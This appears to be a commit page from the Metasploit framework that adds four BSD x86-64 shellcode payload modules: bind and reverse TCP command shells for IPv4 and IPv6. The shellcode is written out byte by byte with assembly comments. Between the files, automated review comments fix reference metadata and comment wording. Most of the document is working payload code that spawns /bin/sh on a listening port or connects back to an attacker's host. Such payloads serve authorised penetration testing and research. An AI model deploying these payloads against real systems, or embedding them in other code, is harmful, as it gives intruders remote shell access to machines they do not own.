
Commit a0539cd

committed
New x64 BSD shellcodes (bind/reverse), IPv4 and IPv6. The IPv4 shells are smaller than
the existing one.
1 parent 5ac97d1 commit a0539cd


4 files changed

+335
-0
lines changed

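--- /dev/null
+++ b/PATH_NOT_SHOWN_ON_PAGE_bind_tcp_ipv6
@@ -0,0 +1,84 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+include Msf::Payload::Single
+include Msf::Payload::Bsd
+include Msf::Sessions::CommandShellOptions
+
+def initialize(info = {})
+super(merge_info(info,
+'Name' => 'BSD x64 Command Shell, Bind TCP Inline (IPv6)',
+'Description' => 'Listen for a connection and spawn a command shell over IPv6',
+'Author' => 'Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>',
+'References' => ['URL', 'https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_ipv6_bind_tcp.asm.c'],
+'License' => MSF_LICENSE,
+'Platform' => 'bsd',
+'Arch' => ARCH_X86_64,
+'Handler' => Msf::Handler::BindTcp,
+'Session' => Msf::Sessions::CommandShellUnix,
+'Payload' =>
+{
+'Offsets' =>
+{
+'LPORT' => [ 20, 'n' ],
+},
+'Payload' =>
+"\x6a\x61" +# pushq $0x61 #
+"\x58" +# pop %rax #
+"\x99" +# cltd #
+"\x6a\x1c" +# pushq $0x1c #
+"\x5f" +# pop %rdi #
+"\x6a\x01" +# pushq $0x1 #
+"\x5e" +# pop %rsi #
+"\x0f\x05" +# syscall #
+"\x48\x97" +# xchg %rax,%rdi #
+"\x52" +# push %rdx #
+"\x52" +# push %rdx #
+"\x52" +# push %rdx #
+"\x68\x00\x1c\x11\x5c" +# pushq $0x5c111c00 #
+"\x48\x89\xe6" +# mov %rsp,%rsi #
+"\x6a\x1c" +# pushq $0x1c #
+"\x5a" +# pop %rdx #
+"\x04\x4c" +# add $0x4c,%al #
+"\x0f\x05" +# syscall #
+"\x48\x31\xf6" +# xor %rsi,%rsi #
+"\x6a\x6a" +# pushq $0x6a #
+"\x58" +# pop %rax #
+"\x0f\x05" +# syscall #
+"\x99" +# cltd #
+"\x04\x1e" +# add $0x1e,%al #
+"\x0f\x05" +# syscall #
+"\x48\x89\xc7" +# mov %rax,%rdi #
+"\x6a\x5a" +# pushq $0x5a #
+"\x58" +# pop %rax #
+"\x0f\x05" +# syscall #
+"\xff\xc6" +# inc %esi #
+"\x04\x5a" +# add $0x5a,%al #
+"\x0f\x05" +# syscall #
+"\xff\xc6" +# inc %esi #
+"\x04\x59" +# add $0x59,%al #
+"\x0f\x05" +# syscall #
+"\x52" +# push %rdx #
+"\x48\xbf\x2f\x2f\x62" +# mov "//b" #
+"\x69\x6e\x2f\x73\x68" +# mov "in/sh",%rdi #
+"\x57" +# push %rdi #
+"\x48\x89\xe7" +# mov %rsp,%rdi #
+"\x52" +# push %rdx #
+"\x57" +# push %rdi #
+"\x48\x89\xe6" +# mov %rsp,%rsi #
+"\x04\x39" +# add $0x39,%al #
+"\x0f\x05" # syscall #
+}
+))
+end
+
+end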
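Review bot: The `'References'` entry in the module info is a flat `['URL', '...']` pair instead of a list of pairs, so the framework will most likely treat `'URL'` and the address as two separate references; it should read `'References' => [ ['URL', 'https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_ipv6_bind_tcp.asm.c'] ],`. The same flat form is used in the other three modules added by this commit (the IPv4 bind payload and both reverse payloads), and needs the same nesting there. Counting the byte string, the `LPORT` offset of 20 does land on the two port bytes of the pushed sockaddr, so only the metadata needs to change.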
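--- /dev/null
+++ b/PATH_NOT_SHOWN_ON_PAGE_bind_tcp_ipv4
@@ -0,0 +1,83 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+include Msf::Payload::Single
+include Msf::Payload::Bsd
+include Msf::Sessions::CommandShellOptions
+
+def initialize(info = {})
+super(merge_info(info,
+'Name' => 'BSD x64 Command Shell, Bind TCP Inline',
+'Description' => 'Listen for a connection and spawn a command shell',
+'Author' => 'Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>',
+'References' => ['URL', 'https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_bind_tcp.asm.c'],
+'License' => MSF_LICENSE,
+'Platform' => 'bsd',
+'Arch' => ARCH_X86_64,
+'Handler' => Msf::Handler::BindTcp,
+'Session' => Msf::Sessions::CommandShellUnix,
+'Payload' =>
+{
+'Offsets' =>
+{
+'LPORT' => [ 18, 'n' ],
+},
+'Payload' =>
+"\x6a\x61" +# pushq $0x61 #
+"\x58" +# pop %rax #
+"\x99" +# cltd #
+"\x6a\x02" +# pushq $0x2 #
+"\x5f" +# pop %rdi #
+"\x6a\x01" +# pushq $0x1 #
+"\x5e" +# pop %rsi #
+"\x0f\x05" +# syscall #
+"\x48\x97" +# xchg %rax,%rdi #
+"\x52" +# push %rdx #
+"\x68\x00\x02\x11\x5c" +# pushq $0x5c110200 #
+"\x48\x89\xe6" +# mov %rsp,%rsi #
+"\x6a\x10" +# pushq $0x10 #
+"\x5a" +# pop %rdx #
+"\x04\x66" +# add $0x66,%al #
+"\x0f\x05" +# syscall #
+"\x48\x31\xf6" +# xor %rsi,%rsi #
+"\x6a\x6a" +# pushq $0x6a #
+"\x58" +# pop %rax #
+"\x0f\x05" +# syscall #
+"\x99" +# cltd #
+"\x04\x1e" +# add $0x1e,%al #
+"\x0f\x05" +# syscall #
+"\x48\x89\xc7" +# mov %rax,%rdi #
+"\x6a\x5a" +# pushq $0x5a #
+"\x58" +# pop %rax #
+"\x0f\x05" +# syscall #
+"\xff\xc6" +# inc %esi #
+"\x04\x5a" +# add $0x5a,%al #
+"\x0f\x05" +# syscall #
+"\xff\xc6" +# inc %esi #
+"\x04\x59" +# add $0x59,%al #
+"\x0f\x05" +# syscall #
+"\x52" +# push %rdx #
+"\x48\xbf\x2f\x2f" +# mov "//" #
+"\x62\x69\x6e\x2f" +# "bin/sh" #
+"\x73\x68" +# mov $0x68732f6e69622f2f,%rdi #
+"\x57" +# push %rdi #
+"\x48\x89\xe7" +# mov %rsp,%rdi #
+"\x52" +# push %rdx #
+"\x57" +# push %rdi #
+"\x48\x89\xe6" +# mov %rsp,%rsi #
+"\x04\x39" +# add $0x39,%al #
+"\x0f\x05" # syscall #
+}
+))
+end
+
+end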
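--- /dev/null
+++ b/PATH_NOT_SHOWN_ON_PAGE_reverse_tcp_ipv6
@@ -0,0 +1,90 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+include Msf::Payload::Single
+include Msf::Payload::Bsd
+include Msf::Sessions::CommandShellOptions
+
+def initialize(info = {})
+super(merge_info(info,
+'Name' => 'BSD x64 Command Shell, Reverse TCP Inline (IPv6)',
+'Description' => 'Connect back to attacker and spawn a command shell over IPv6',
+'Author' => 'Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>',
+'References' => ['URL', 'https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_ipv6_reverse_tcp.asm.c'],
+'License' => MSF_LICENSE,
+'Platform' => 'bsd',
+'Arch' => ARCH_X86_64,
+'Handler' => Msf::Handler::ReverseTcp,
+'Session' => Msf::Sessions::CommandShellUnix,
+'Payload' =>
+{
+'Offsets' =>
+{
+'LHOST' => [ 85, 'ADDR6' ],
+'LPORT' => [ 79, 'n' ],
+'SCOPEID' => [ 101, 'V' ]
+},
+'Payload' =>
+"\x6a\x61" +# pushq $0x61 #
+"\x58" +# pop %rax #
+"\x99" +# cltd #
+"\x6a\x1c" +# pushq $0x1c #
+"\x5f" +# pop %rdi #
+"\x6a\x01" +# pushq $0x1 #
+"\x5e" +# pop %rsi #
+"\x0f\x05" +# syscall #
+"\x48\x97" +# xchg %rax,%rdi #
+"\x04\x3e" +# add $0x3e,%al #
+"\x0f\x05" +# syscall #
+"\xff\xc6" +# inc %esi #
+"\x04\x59" +# add $0x59,%al #
+"\x0f\x05" +# syscall #
+"\xff\xce" +# dec %esi #
+"\xff\xce" +# dec %esi #
+"\x04\x58" +# add $0x58,%al #
+"\x0f\x05" +# syscall #
+"\xe9\x23\x00\x00\x00" +# jmpq <forth> #
+# back:
+"\x5e" +# pop %rsi #
+"\x6a\x1c" +# pushq $0x1c #
+"\x5a" +# pop %rdx #
+"\x66\x83\xc0\x62" +# add $0x62,%ax #
+"\x0f\x05" +# syscall #
+"\x99" +# cltd #
+"\x52" +# push %rdx #
+"\x48\xbf\x2f\x2f\x62" +# mov "//b" #
+"\x69\x6e\x2f\x73\x68" +# "in/sh",%rdi #
+"\x57" +# push %rdi #
+"\x48\x89\xe7" +# mov %rsp,%rdi #
+"\x52" +# push %rdx #
+"\x57" +# push %rdi #
+"\x48\x89\xe6" +# mov %rsp,%rsi #
+"\x04\x3b" +# add $0x3b,%al #
+"\x0f\x05" +# syscall #
+# forth:
+"\xe8\xd8\xff\xff\xff" +# callq <back> #
+# sockaddr_in6
+"\x00\x1c\x11\x5c" +# AF_INET6+port #
+"\x00\x00\x00\x00" +# no-one-cares #
+"\x00\x00\x00\x00" +# IPv6- #
+"\x00\x00\x00\x00" +# addr- #
+"\x00\x00\x00\x00" +# in- #
+"\x00\x00\x00\x01" +# 16 bytes #
+"\x00\x00\x00\x00" # Scope ID #
+}
+))
+register_options([
+OptInt.new('SCOPEID', [false, "IPv6 scope ID, for link-local addresses", 0])
+])
+end
+
+end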
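Review bot: The comment `# no-one-cares #` on the four zero bytes that follow the port in the trailing `sockaddr_in6` block does not say which structure field is being filled, which makes the `Offsets` table (`LHOST` at 85, `SCOPEID` at 101) hard to audit against the layout. Name the fields the way the neighbouring `# AF_INET6+port #` line does, e.g. `# sin6_flowinfo (unused) #` on that line, `# sin6_addr, 16 bytes, patched via LHOST #` on the first of the four address lines and `# sin6_scope_id, patched via SCOPEID #` on the last line. Counting the byte string, the stated offsets do match the layout (port at 79, address at 85, scope id at 101), so this is a documentation change only.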
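--- /dev/null
+++ b/PATH_NOT_SHOWN_ON_PAGE_reverse_tcp_ipv4
@@ -0,0 +1,78 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+include Msf::Payload::Single
+include Msf::Payload::Bsd
+include Msf::Sessions::CommandShellOptions
+
+def initialize(info = {})
+super(merge_info(info,
+'Name' => 'BSD x64 Command Shell, Reverse TCP Inline',
+'Description' => 'Connect back to attacker and spawn a command shell',
+'Author' => 'Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>',
+'References' => ['URL', 'https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_reverse_tcp.asm.c'],
+'License' => MSF_LICENSE,
+'Platform' => 'bsd',
+'Arch' => ARCH_X86_64,
+'Handler' => Msf::Handler::ReverseTcp,
+'Session' => Msf::Sessions::CommandShellUnix,
+'Payload' =>
+{
+'Offsets' =>
+{
+'LHOST' => [ 39, 'ADDR' ],
+'LPORT' => [ 37, 'n' ],
+},
+'Payload' =>
+"\x6a\x61" +# pushq $0x61 #
+"\x58" +# pop %rax #
+"\x99" +# cltd #
+"\x6a\x02" +# pushq $0x2 #
+"\x5f" +# pop %rdi #
+"\x6a\x01" +# pushq $0x1 #
+"\x5e" +# pop %rsi #
+"\x0f\x05" +# syscall #
+"\x48\x97" +# xchg %rax,%rdi #
+"\x04\x58" +# add $0x58,%al #
+"\x0f\x05" +# syscall #
+"\xff\xc6" +# inc %esi #
+"\x04\x59" +# add $0x59,%al #
+"\x0f\x05" +# syscall #
+"\xff\xce" +# dec %esi #
+"\xff\xce" +# dec %esi #
+"\x04\x58" +# add $0x58,%al #
+"\x0f\x05" +# syscall #
+"\x52" +# push %rdx #
+"\x48\xbb\x00\x02\x11" +# mov ... #
+"\x5c\x7f\x00\x00\x01" +# mov $0x100007f5c110200,%rbx #
+"\x53" +# push %rbx #
+"\x48\x89\xe6" +# mov %rsp,%rsi #
+"\x6a\x10" +# pushq $0x10 #
+"\x5a" +# pop %rdx #
+"\x66\x83\xc0\x62" +# add $0x62,%ax #
+"\x0f\x05" +# syscall #
+"\x99" +# cltd #
+"\x52" +# push %rdx #
+"\x48\xbf\x2f\x2f\x62" +# mov "//b" #
+"\x69\x6e\x2f\x73\x68" +# "in/sh", %rdi #
+"\x57" +# push %rdi #
+"\x48\x89\xe7" +# mov %rsp,%rdi #
+"\x52" +# push %rdx #
+"\x57" +# push %rdi #
+"\x48\x89\xe6" +# mov %rsp,%rsi #
+"\x04\x3b" +# add $0x3b,%al #
+"\x0f\x05" # syscall #
+}
+))
+end
+
+end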
